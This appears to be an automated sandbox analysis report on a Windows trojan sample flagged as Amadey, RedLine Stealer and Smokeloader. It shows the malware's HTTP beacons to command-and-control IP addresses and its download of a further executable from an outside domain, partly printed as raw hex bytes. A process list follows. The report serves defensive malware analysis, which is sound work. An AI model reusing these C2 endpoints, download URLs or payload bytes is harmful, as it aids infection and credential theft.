                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  7192.168.2.649731185.208.158.116806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:10.832449913 CEST317OUTPOST /hb9IvshS01/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.208.158.116
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43
                  Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  8192.168.2.649733185.209.162.226806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:12.682913065 CEST159OUTPOST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.64973489.23.103.42806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:13.149159908 CEST184OUTPOST /hb9IvshS02/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 89.23.103.42
                  Content-Length: 31
                  Cache-Control: no-cache
                  Data Raw: 64 31 3d 31 30 30 30 30 30 34 30 38 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                  Data Ascii: d1=1000004081&unit=246122658369
                  Jul 10, 2024 17:36:14.068423986 CEST193INHTTP/1.1 200 OK
                  Server: nginx/1.14.0 (Ubuntu)
                  Date: Wed, 10 Jul 2024 15:36:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 4 <c>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.649735185.209.162.226806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:14.399072886 CEST317OUTPOST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 33 34 37 42 33 38 37 46 33 31 42 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 35 37 41 43 34 41 32 37 45 43 31 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43
                  Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB347B387F31BCB5890B8DB99826E17CB5320708AF3357AC4A27EC1E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.649736185.209.162.226806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:14.939579010 CEST159OUTPOST /hb9IvshS03/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.209.162.226
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.649737185.208.158.116806912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  Jul 10, 2024 17:36:14.939673901 CEST159OUTPOST /hb9IvshS01/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.208.158.116
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s


                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.649732188.114.96.34436912C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  TimestampBytes transferredDirectionData
                  2024-07-10 15:36:12 UTC51OUTGET /am/random.exe HTTP/1.1
                  Host: fellzobr.com
                  2024-07-10 15:36:12 UTC688INHTTP/1.1 200 OK
                  Date: Wed, 10 Jul 2024 15:36:12 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 439808
                  Connection: close
                  Last-Modified: Wed, 10 Jul 2024 15:12:18 GMT
                  ETag: "668ea4d2-6b600"
                  Cache-Control: max-age=14400
                  CF-Cache-Status: HIT
                  Age: 271
                  Accept-Ranges: bytes
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dqZeDXRzs7cBo6oe1LxphNst9vuFwLSDgcdBehJgoYGgyMRZvm4488qzgwxgEnAnRQizo9U1tRta3zS1YFi4m8dAkyWvANpm5OPTWWMDzLraQY8Wi5Scw3MTdNTA0us%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8a11a0c6da8a42e5-EWR
                  alt-svc: h3=":443"; ma=86400
                  2024-07-10 15:36:12 UTC681INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a1 bb b8 fb e5 da d6 a8 e5 da d6 a8 e5 da d6 a8 8a ac 7d a8 fe da d6 a8 8a ac 48 a8 f6 da d6 a8 8a ac 7c a8 a2 da d6 a8 ec a2 45 a8 ee da d6 a8 e5 da d7 a8 83 da d6 a8 8a ac 79 a8 e4 da d6 a8 8a ac 4c a8 e4 da d6 a8 8a ac 4b a8 e4 da d6 a8 52 69 63 68 e5 da d6 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1b ef a0 65 00 00 00 00 00 00 00 00 e0 00 03
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$}H|EyLKRichPELe
                  2024-07-10 15:36:12 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii:
                  2024-07-10 15:36:12 UTC1369INData Raw: d3 60 4e 21 c7 45 48 d9 93 d6 5f c7 85 58 ff ff ff 2c f4 5e 1d c7 85 10 ff ff ff 49 21 73 57 c7 45 c0 4f 89 75 02 c7 85 08 ff ff ff db b8 a7 5a c7 45 e8 22 4b 30 18 c7 85 14 ff ff ff 0b 53 5e 64 c7 85 bc fe ff ff a2 f7 76 06 c7 85 c4 fe ff ff 2f 6c 3b 73 c7 45 90 1d 18 68 45 c7 45 a4 65 60 7a 6a c7 45 2c c3 dc d6 2a c7 85 9c fe ff ff 79 45 0e 57 c7 45 04 53 9f 6c 6b c7 45 c8 1d 8b a3 66 c7 45 34 54 5d aa 4b c7 85 38 ff ff ff 6f c4 40 35 c7 45 0c aa 0a 11 42 c7 85 4c ff ff ff 5d 74 28 7c c7 45 10 07 d1 40 40 c7 45 3c 15 bf 5d 7f c7 85 d0 fe ff ff 8a cc c4 69 c7 45 ac ed d3 33 0a c7 85 28 ff ff ff 5b 0f b5 50 c7 85 cc fe ff ff d6 a0 e2 71 c7 45 50 88 fe 33 4d c7 45 f0 5d 08 06 6c c7 85 98 fe ff ff a7 49 02 5d c7 45 18 56 62 10 5e c7 45 b4 b0 83 16 15 c7 85
                  Data Ascii: `N!EH_X,^I!sWEOuZE"K0S^dv/l;sEhEEe`zjE,*yEWESlkEfE4T]K8o@5EBL]t(|E@@E<]iE3([PqEP3ME]lI]EVb^E
                  2024-07-10 15:36:12 UTC1369INData Raw: ff 8d 0c 38 81 f9 8d 00 00 00 75 25 53 53 ff 15 60 10 44 00 53 53 53 ff 15 58 11 44 00 53 53 ff 15 54 11 44 00 68 30 29 44 00 ff d6 a1 1c c4 84 02 47 81 ff 81 86 03 00 7c c7 8b 0d a8 be 84 02 c1 e8 03 3b c3 76 10 8b f1 8b f8 56 e8 d2 f6 ff ff 83 c6 08 4f 75 f4 33 f6 53 ff 15 4c 10 44 00 83 fe 61 75 13 89 5d ec 81 45 ec 00 00 00 00 8b 45 ec 01 05 a8 be 84 02 46 81 fe bd 74 06 00 7c d8 6a 7b 5e 81 3d 1c c4 84 02 86 00 00 00 75 38 53 53 53 53 53 53 53 ff 15 90 10 44 00 53 ff 15 54 10 44 00 53 53 ff 15 24 10 44 00 53 53 ff 15 70 10 44 00 53 53 53 ff 15 88 10 44 00 53 53 53 53 53 ff 15 68 11 44 00 4e 75 b9 e8 d5 f5 ff ff ff 15 a8 be 84 02 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c3 81 ec 00 04 00 00 56 57 33 f6 33 ff 56 56 56 ff 15 34 10 44 00 81 ff 85 c0 5b
                  Data Ascii: 8u%SS`DSSSXDSSTDh0)DG|;vVOu3SLDau]EEFt|j{^=u8SSSSSSSDSTDSS$DSSpDSSSDSSSSShDNuM_^d[VW33VVV4D[
                  2024-07-10 15:36:12 UTC1369INData Raw: 87 46 00 ff 15 a8 10 44 00 85 c0 75 18 56 e8 2f 04 00 00 8b f0 ff 15 48 10 44 00 50 e8 df 03 00 00 59 89 06 5e 5d c3 cc cc cc cc cc 57 8b 7c 24 08 eb 6e 8d a4 24 00 00 00 00 8b ff 8b 4c 24 04 57 f7 c1 03 00 00 00 74 13 8a 01 83 c1 01 84 c0 74 3d f7 c1 03 00 00 00 75 ef 8b ff 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 23 84 e4 74 1a a9 00 00 ff 00 74 0e a9 00 00 00 ff 74 02 eb cd 8d 79 ff eb 0d 8d 79 fe eb 08 8d 79 fd eb 03 8d 79 fc 8b 4c 24 0c f7 c1 03 00 00 00 74 1d 8a 11 83 c1 01 84 d2 74 66 88 17 83 c7 01 f7 c1 03 00 00 00 75 ea eb 05 89 17 83 c7 04 ba ff fe fe 7e 8b 01 03 d0 83 f0 ff 33 c2 8b 11 83 c1 04 a9 00 01 01 81 74 e1 84 d2 74 34 84 f6 74 27 f7 c2 00 00 ff 00 74 12 f7 c2 00 00 00 ff 74 02 eb c7 89
                  Data Ascii: FDuV/HDPY^]W|$n$L$Wtt=u~3tAt#tttyyyyL$ttfu~3tt4t'tt
                  2024-07-10 15:36:12 UTC1369INData Raw: c0 75 10 8b 0e 85 c9 74 02 ff d1 83 c6 04 3b 75 0c 72 ec 5e 5d c3 8b ff 55 8b ec 83 3d d0 d3 84 02 00 74 19 68 d0 d3 84 02 e8 65 1b 00 00 59 85 c0 74 0a ff 75 08 ff 15 d0 d3 84 02 59 e8 9b 1a 00 00 68 98 11 44 00 68 84 11 44 00 e8 a1 ff ff ff 59 59 85 c0 75 54 56 57 68 4c 30 40 00 e8 63 1a 00 00 b8 7c 11 44 00 be 80 11 44 00 59 8b f8 3b c6 73 0f 8b 07 85 c0 74 02 ff d0 83 c7 04 3b fe 72 f1 83 3d d4 d3 84 02 00 5f 5e 74 1b 68 d4 d3 84 02 e8 fb 1a 00 00 59 85 c0 74 0c 6a 00 6a 02 6a 00 ff 15 d4 d3 84 02 33 c0 5d c3 6a 20 68 a0 33 44 00 e8 2a 10 00 00 6a 08 e8 56 16 00 00 59 83 65 fc 00 33 c0 40 39 05 00 88 46 00 0f 84 d8 00 00 00 a3 fc 87 46 00 8a 45 10 a2 f8 87 46 00 83 7d 0c 00 0f 85 a0 00 00 00 ff 35 c8 d3 84 02 8b 35 c8 10 44 00 ff d6 8b d8 89 5d d0 85
                  Data Ascii: ut;ur^]U=theYtuYhDhDYYuTVWhL0@c|DDY;st;r=_^thYtjjj3]j h3D*jVYe3@9FFEF}55D]
                  2024-07-10 15:36:12 UTC1369INData Raw: 86 00 00 00 eb 2e 3d 92 00 00 c0 75 09 c7 46 64 8a 00 00 00 eb 1e 3d b5 02 00 c0 75 09 c7 46 64 8d 00 00 00 eb 0e 3d b4 02 00 c0 75 07 c7 46 64 8e 00 00 00 ff 76 64 6a 08 ff d2 59 89 7e 64 eb 07 83 60 08 00 51 ff d2 59 89 5e 60 5b 83 c8 ff 5f 5e 5d c3 8b ff 56 57 33 ff 39 3d cc d3 84 02 75 05 e8 50 22 00 00 8b 35 dc d3 84 02 85 f6 75 05 be 98 1c 44 00 8a 06 3c 20 77 08 84 c0 74 2e 85 ff 74 24 3c 22 75 09 33 c9 85 ff 0f 94 c1 8b f9 0f b6 c0 50 e8 3f 1b 00 00 59 85 c0 74 01 46 46 eb d3 3c 20 77 07 46 8a 06 84 c0 75 f5 5f 8b c6 5e c3 83 3d cc d3 84 02 00 75 05 e8 f6 21 00 00 56 8b 35 c0 87 46 00 57 33 ff 85 f6 75 18 83 c8 ff e9 91 00 00 00 3c 3d 74 01 47 56 e8 18 16 00 00 59 8d 74 06 01 8a 06 84 c0 75 ea 6a 04 47 57 e8 83 22 00 00 8b f8 59 59 89 3d e0 87 46
                  Data Ascii: .=uFd=uFd=uFdvdjY~d`QY^`[_^]VW39=uP"5uD< wt.t$<"u3P?YtFF< wFu_^=u!V5FW3u<=tGVYtujGW"YY=F
                  2024-07-10 15:36:12 UTC1369INData Raw: 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d ac d2 84 02 7c a2 eb 06 8b 1d ac d2 84 02 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83 f8 fe 74 57 8b 4d fc 8a 09 f6 c1 01 74 4d f6 c1 08 75 0b 50 ff 15 ec 10 44 00 85 c0 74 3d 8b f7 83 e6 1f 8b c7 c1 f8 05 c1 e6 06 03 34 85 c0 d2 84 02 8b 45 f8 8b 00 89 06 8b 45 fc 8a 00 88 46 04 68 a0 0f 00 00 8d 46 0c 50 ff 15 e8 10 44 00 85 c0 0f 84 bc 00 00 00 ff 46 08 83 45 f8 04 47 ff 45 fc 3b fb 7c 8e 33 db 8b f3 c1 e6 06 03 35 c0 d2 84 02 8b 06 83 f8 ff 74 0b 83 f8 fe 74 06 80 4e 04 80 eb 71 c6 46 04 81 85 db 75 05 6a f6 58 eb 0a 8d 43 ff f7 d8 1b c0 83 c0 f5 50 ff 15 d0 10 44 00 8b f8 83 ff ff 74 42 85 ff 74 3e 57 ff
                  Data Ascii: ```3f@f@ @/@P;r9|3~rEt\tWMtMuPDt=4EEFhFPDFEGE;|35ttNqFujXCPDtBt>W
                  2024-07-10 15:36:12 UTC1369INData Raw: f8 ff 0f 84 c1 00 00 00 ff 35 3c 8f 46 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 96 ef ff ff ff 35 38 8f 46 00 8b 35 f4 10 44 00 ff d6 ff 35 3c 8f 46 00 a3 38 8f 46 00 ff d6 ff 35 40 8f 46 00 a3 3c 8f 46 00 ff d6 ff 35 44 8f 46 00 a3 40 8f 46 00 ff d6 a3 44 8f 46 00 e8 34 05 00 00 85 c0 74 63 8b 3d c8 10 44 00 68 3c 32 40 00 ff 35 38 8f 46 00 ff d7 ff d0 a3 b8 41 44 00 83 f8 ff 74 44 68 14 02 00 00 6a 01 e8 3b 18 00 00 8b f0 59 59 85 f6 74 30 56 ff 35 b8 41 44 00 ff 35 40 8f 46 00 ff d7 ff d0 85 c0 74 1b 6a 00 56 e8 2c fc ff ff 59 59 ff 15 0c 11 44 00 83 4e 04 ff 89 06 33 c0 40 eb 07 e8 d7 fb ff ff 33 c0 5e 5f c3 cc cc cc cc cc cc cc cc cc cc 68 50 35 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 10 43 44 00 31 45 fc 33 c5
                  Data Ascii: 5<FP58F5D5<F8F5@F<F5DF@FDF4tc=Dh<2@58FADtDhj;YYt0V5AD5@FtjV,YYDN3@3^_hP5@d5D$l$l$+SVWCD1E3
                  2024-07-10 15:36:12 UTC1369INData Raw: 00 ff 15 c8 10 44 00 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 7d ff ff ff cc 68 14 39 40 00 ff 15 f4 10 44 00 a3 4c 8f 46 00 c3 8b ff 56 57 33 f6 bf 50 8f 46 00 83 3c f5 c4 41 44 00 01 75 1d 8d 04 f5 c0 41 44 00 89 38 68 a0 0f 00 00 ff 30 83 c7 18 ff 15 e8 10 44 00 85 c0 74 0c 46 83 fe 24 7c d3 33 c0 40 5f 5e c3 83 24 f5 c0 41 44 00 00 33 c0 eb f1 8b ff 53 8b 1d f0 10 44 00 56 be c0 41 44 00 57 8b 3e 85 ff 74 13 83 7e 04 01 74 0d 57 ff d3 57 e8 89 e4 ff ff 83 26 00 59 83 c6 08 81 fe e0 42 44 00 7c dc be c0 41 44 00 5f 8b 06 85 c0 74 09 83 7e 04 01 75 03 50 ff d3 83 c6 08 81 fe e0 42 44 00 7c e6 5e 5b c3 8b ff 55 8b ec 8b 45 08 ff 34 c5 c0 41 44 00 ff 15 34 11 44 00 5d c3 6a 0c 68 50 34 44 00 e8 83 fa ff ff 33 ff 47
                  Data Ascii: Dte3@eE}h9@DLFVW3PF<ADuAD8h0DtF$|3@_^$AD3SDVADW>t~tWW&YBD|AD_t~uPBD|^[UE4AD4D]jhP4D3G


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:11:34:57
                  Start date:10/07/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x400000
                  File size:439'808 bytes
                  MD5 hash:233EA23B1C1587F1CF895F08BA6DA10B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2134722904.0000000004530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:4
                  Start time:11:34:59
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 728
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:6
                  Start time:11:35:00
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 780
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:8
                  Start time:11:35:01
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 856
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:10
                  Start time:11:35:02
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 864
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:12
                  Start time:11:35:02
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:14
                  Start time:11:35:03
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 912
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:16
                  Start time:11:35:04
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1040
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:18
                  Start time:11:35:05
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1048
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:20
                  Start time:11:35:06
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1180
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:22
                  Start time:11:35:07
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1204
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:23
                  Start time:11:35:08
                  Start date:10/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe"
                  Imagebase:0x400000
                  File size:439'808 bytes
                  MD5 hash:233EA23B1C1587F1CF895F08BA6DA10B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000003.2238394423.0000000004530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:25
                  Start time:11:35:08
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3916 -s 1212
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:27
                  Start time:11:35:10
                  Start date:10/07/2024
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 476
                  Imagebase:0x570000
                  File size:483'680 bytes
                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Has exited:true

                  General

                  Target ID:33
                  Start time:11:36:00
                  Start date:10/07/2024
                  Path:C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\3bca58cece\Hkbsse.exe
                  Imagebase:0x400000
                  File size:439'808 bytes
                  MD5 hash:233EA23B1C1587F1CF895F08BA6DA10B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.2879671000.0000000002B63000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
